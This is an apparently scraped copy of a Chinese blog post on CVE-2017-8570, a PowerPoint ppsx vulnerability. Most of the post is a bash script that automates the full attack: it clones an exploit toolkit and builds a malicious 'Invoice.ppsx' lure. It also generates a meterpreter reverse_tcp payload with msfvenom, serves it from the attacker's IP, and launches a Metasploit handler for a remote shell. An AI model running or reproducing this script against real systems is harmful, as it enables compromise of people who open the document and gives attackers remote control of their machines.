0
CVE-2017-8570 自动化
source link: https://y4er.com/post/cve-2017-8570/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
1 min read
CVE-2017-8570 自动化
2019-01-07CVE-2017-8570是一个PowerPoint演示文稿的漏洞,利用方法简单且危害较大。攻击者只需要将生成的恶意ppsx(ppsx是office2007版以后的演示文稿的保存格式)文档发送给用户,用户打开放映后就会中招。
影响范围:
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
自动化脚本
attack_ip="192.168.1.212"
LPORT="6666"
DIR="/var/cve2017"
if [ -d ${DIR} ]; then
rm -rf ${DIR}
mkdir ${DIR}
else
mkdir ${DIR}
fi
cd $DIR
`git clone https://github.com/tezukanice/Office8570.git`
cd Office8570
mkdir template
mv template.ppsx template/template.ppsx
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://$attack_ip"/logo.doc"
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=${attack_ip} LPORT=${LPORT} -f exe > ${DIR}/shell.exe`
gnome-terminal -e "python cve-2017-8570_toolkit.py -M exp -e http://${attack_ip}/shell.exe -l ${DIR}/shell.exe"
`service postgresql start`
if [ -f "exp.rc" ]; then
rm "exp.rc"
fi
echo "use exploit/multi/handler">>exp.rc
echo "set LHOST "$attack_ip>>exp.rc
echo "set LPORT "$LPORT>>exp.rc
echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp">>exp.rc
echo "exploit">>exp.rc
gnome-terminal -e "msfconsole -r exp.rc"
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK